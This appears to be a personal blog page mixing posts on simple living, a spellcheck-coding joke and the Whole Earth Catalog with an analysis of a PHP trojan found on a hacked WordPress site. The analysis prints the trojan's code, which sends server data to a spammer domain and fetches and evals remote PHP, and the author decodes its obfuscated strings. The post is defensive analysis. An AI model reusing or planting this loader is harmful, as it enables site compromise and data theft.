This page intentionally left ugly
A programmer and technology enthusiast destroys programming and technology. Welcome to the dichotomy of my existence...
Feel free to browse the experiments and pick up anything you may find useful. Or head over to the obligatory introduction.
WARNING: I post a lot of code on this blog and some of it gets mangled by WordPress formatting. Please double-check for missing or extra quotes, backslashes, '<' and '>' transformed into '<' and '>' and other problems. All the code posted here has been verified to work before I post, except in cases where I explicitly mention that it's incomplete.
Small and Common Sense Living
Ever think to yourself how much of what you own is actually making you happy? Or how about whether the house you live in is actually sustainable in terms of budget and the environment? How much of our legal system and social norms force people into houses they don’t need?
What would you really consider to be a home vs just a house?
Jay Shafer talks a little about how we’ve talked, legislated and fooled ourselves into a type of living that’s making most of us fundamentally unhappy and, in many cases, homeless and destitute instead of enjoying life.
Tim Guiles goes into more detail in exploring this what we need vs what we want problem… that shouldn’t really be a problem in the first place. He also goes into the experience of decreasing living space as construction begins only to increase dramatically as the windows are installed. Touching on Jay Shafer’s comments above, it’s the sense of bringing the outside environment indoors.
Damn you, brain! Why can’t YOU run spellcheck?!
I just came back from a late night coffee run and decided to sit down to work a little on my discussion forum before going to bed (I need coffee to sleep… don’t ask).
It was all fine and dandy until I decided to add a little spellcheck option to the input form. Not expecting that many people will use it since this is also meant to be mobile friendly so a lot of posts will likewise be txtspeak gibberish, but I thought it would be nice to have the feature anyway.
Let me preface this by saying that I have never been good at spelling or even an OK at spelling for that matter. I was even rubbish at spelling in Sinhalese when I was a little kid so this isn’t just an English thing. I don’t know if it’s some undiagnosed form of dyslexia or maybe I’m typing faster than the throughput of my cerebral plumbing or visa versa; either way, I just can’t spell.
So when I started writing the spellcheck functionality, I thought it was a simple, straightfoward affair. A dictionary source, a backend response generator and some client-side jQuery witchcraft to make this work without any added burden to the UI.
The burden, it turns out, was to my prefrontal cortex.
E.G. This was meant to be just a simpler version of the spellecheck plugin which comes with TinyMCE. I’m wasn’t using an IDE for the JS side of this, so I figured I’d be fine with just notepad.
What’s wrong with this?
(function() {
tinymce.create('tinymce.plugins.SpelchekcPlugin', {
inti : function(ed, url) {
// Some stuff will happen here
},
createControl : function(n, cm) {
return null;
},
getInfo : function() {
return {
longname: 'Spellcheck Plugin',
author : 'eksith'
};
}
});
});
Sometimes, I feel like a construction worker who’s always safe with equipment, always wears a helmet, always on time and always forgets his pants.
Anatomy of a PHP trojan
A very small sample of how incorrectly configured websites can invite trouble for visitors. I was prompted to write about this after hearing about a hacking incident of another friend’s website. The backend was compromised with no apparent user involvement which means another site on the same server possibly served as the backdoor or perhaps the server admins didn’t set the permissions correctly.
A little while ago, I was hosting a website which had been running an older version of WordPress. The site owners had long since let the installation lapse and, as always, there were vulnerabilities in the uploading privileges which were exploited. Since I had let the owners do whatever they pleased with their space and given them a lot of freedom, I didn’t pay as much attention as I should have. No other site on the server was compromised since they had sandboxed access.
Certain WordPress plugins require an inordinate amount of privileges, which is the one big reason to run a site with the minumum necessary plugins and to always keep them up to date. There is also no reason to keep stale files on the server or allow arbritary writing and uploading privileges when the bare minimum is acceptable.
The following is a file called 189715.php found on the /wp-uploads folder of this website and the same code was found in other areas with different number filenames. This was all jammed into one line, so I’ve expanded it here for clarity. Certain portions have been redacted :
<?php /**/eval(base64_decode('[BASE64 ENCODED STRING]')); ?>
<?
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?" .
base64_encode($a). "." .
base64_encode($b) . "." .
base64_encode($c) . "." .
base64_encode($d) . "." .
base64_encode($e) . "." .
base64_encode($f) . "." .
base64_encode($g) . "." .
base64_encode($h) . ".e." .
base64_encode($i) . "." .
base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i) && isset($_REQUEST["q"]) &&
md5($_REQUEST["q"])=="cfe044f810cd8d8e6e5759d4005cf72f")
$f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
eval($c);
else{
$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);
};
die(); ?>
Variable $z was basically a querystring intended to send all of the relevant server and environment data gathered in the previously defined variables.
String “cGhwc2VhcmNoLmNu” assigned to the $f variable turned out to be “phpsearch.cn”, this particular spammer’s domain. String “aHR0cDovL2FkczMu” turned out to be subdomain “http://ads3.” meaning this was a domain intended to inject spam and I’m sure the domain itself was expendable. String “aHR0cDovLzcxLg==” was pointing to subdomain “http://71.” while “aHR0cDovLzcu” was subdomain “http://7.”.
That include block was meant to try and download another PHP file remotely which it would then try to execute locally with the “eval()” function.
If the remote include failed, it would try curl to get the file and execute the file instead.
The [BASE64 ENCODED STRING] was actually another encoded function :
if(function_exists('ob_start') && !isset($GLOBALS['mfsn'])){
$GLOBALS['mfsn']='[REDACTED ROOT]/wp-content/upgrade/openid/openid/Auth/OpenID/style.css.php';
if(file_exists($GLOBALS['mfsn'])){
include_once($GLOBALS['mfsn']);
if(function_exists('gml') && function_exists('dgobh'))
{ob_start('dgobh');}
}
}
The [REDACTED ROOT] is of course where the WP installation directory on this server and in this case, the compromised plugin was OpenID.
The Auth/OpenID directory was full of junk that was surrepticiously uploaded as well. Also, the content of the style.css.php was another massive block of base64 encoded code (which I was unable to decode) and “mfsn” variable held the location of another file that was meant to be dynamically included at runtime. I was unable to find what the “gml” and “dgobh” functions were, but I can guess that it included everything from more injection code to spam to even drive-by downloads.
After running a scan on this server, this file and those like it turned out to be called the Small-AH trojan.
PHP Trojans would often employ base64 encoding and even splitting up the encoded string into multiple sections before decoding and running eval(). This would make it harder to spot and even harder to figure out what the code does exactly, especially in a big file, with just a cursory glance.
Site of the Week: Pantheism.net
I’ve been fascinated with the Pantheism movement for a very long time and this is probably the closest modern, spiritually prefaced, interpretation of the age long idea of not [pooping] where you eat. I.E. Live and let live, responsibly. Pantheism.net is a good resource for people just starting to learning the details.
Are you searching for a path which focuses on Earth in the Cosmos, rather than some imaginary beyond? Are you more concerned with saving the planet than saving your eternal soul?
Do you hunger for a spirituality that respects individual choice rather than pushing prejudice down people's throats, and that values reason rather than fanaticism?
Do you find it impossible to believe in supernatural beings, and difficult to conceive of anything more worthy of the deepest respect than the beauty of Nature or the power and mystery of the Universe?
Do you feel a deep sense of peace and belonging and wonder in the midst of Nature?
If you answered yes to these questions, then you will feel at home in the World Pantheist Movement.
Whole Earth Catalog: A roadmap to humanity
I found this volume at a tag sale some years ago and thought it was just a curiosity at the time. I bought it for a few dollars and took it home only to forget about it until recently (moving does that to you sometimes).
After getting another chance to go over everything I’ve been missing, I have to say… This is by far one of the best resources on simple living, sustainability and even our own peculiarities (I.E. there is no censorship). The Whole Earth Catalog should be in everyone’s library. If anything it can really open some eyes that are sewn shut with self-centeredness these days.
It’s one of the more revolutionary publications that will sorely be missed today.
Subtitling this "Access to Tools" has to be one of the biggest understatements in publishing. It's oh-so-much-more
The catalog is a year older than me! And it really does cover the Whole Earth!
Published October 1981
The map has changed a bit since this edition, but the topics it covers – vast in breadth and depth — goes from “Understanding Whole Systems” which include Laws of form, Space, Eco-ethics, Evolution, Natural history, Plants as well as “Community” which includes Recycling, Rural emergency, Home nursing Women’s health, Childbirth (in graphic detail), Sex (also in “detail” of sorts), Consumer reports and everything in-between. It’s a who’s who and what’s what of basic and enhanced living.
The list of topics covered is copious as it is astoundingly fascinating.
While browsing through this time, I came across an article on Sri Lanka! Specifically the concept of “Shramadana” which is a contraction of Sarvodaya Shamadana Movement in Sri Lanka. The article goes into a specific example at work, however considering this was published before the civil war, I don’t know how many of these people are still around. Hopefully many. Their example will be one of the few things that will keep the country going.
"It does not require oil, gas coal or nukes; it empowers people not machines; it is shramadana. Literally meaning the giving (dana) of human energy (shrama)"
The concept can best be summarized as using human equity toward completing projects for the community. Anyone can grab a tool and participate provided you’re of able body and sound mind. It doesn’t matter what your social status is; a banker and farmer are equals in terms of what they can contribute in human energy.
Habitat for Humanity is probably the closest Western counterpart
What really got me interested are the aspects of environmental consciousness that and examples of “better” and “wiser” living that we could really use right now. It really drives home how much this was ahead of its time as only now are we starting to understand the consequences of our actions.
"The Man Who Planted Trees and Grew Happiness" - Brilliant!
Then there are the creative aspects of what we can actually do about this. The sustainability pointers in this are, I think, invaluable today more than ever.
Building a house using telephone poles as raw material. How creative is that?
The book is full of examples like these for simple, sustainable living as well as creative solutions to real world problems that are oddly still applicable by and large today.
Then there are also aspects of humanity that some of us still wouldn’t dare discuss openly or honestly. It’s amazing testament to how much popular publications censor themselves on real issues while advancing pointless topics. Talk about being hypocritical prudes.
I had to cover the naughty bits. This being a family-friendly blog and all ;)
Did I mention there’s no censorship in this book? Can you imagine a popular publication making mention of something like this today?
And that, boys and girls, is why I keep thinking I was born a few decades too late.
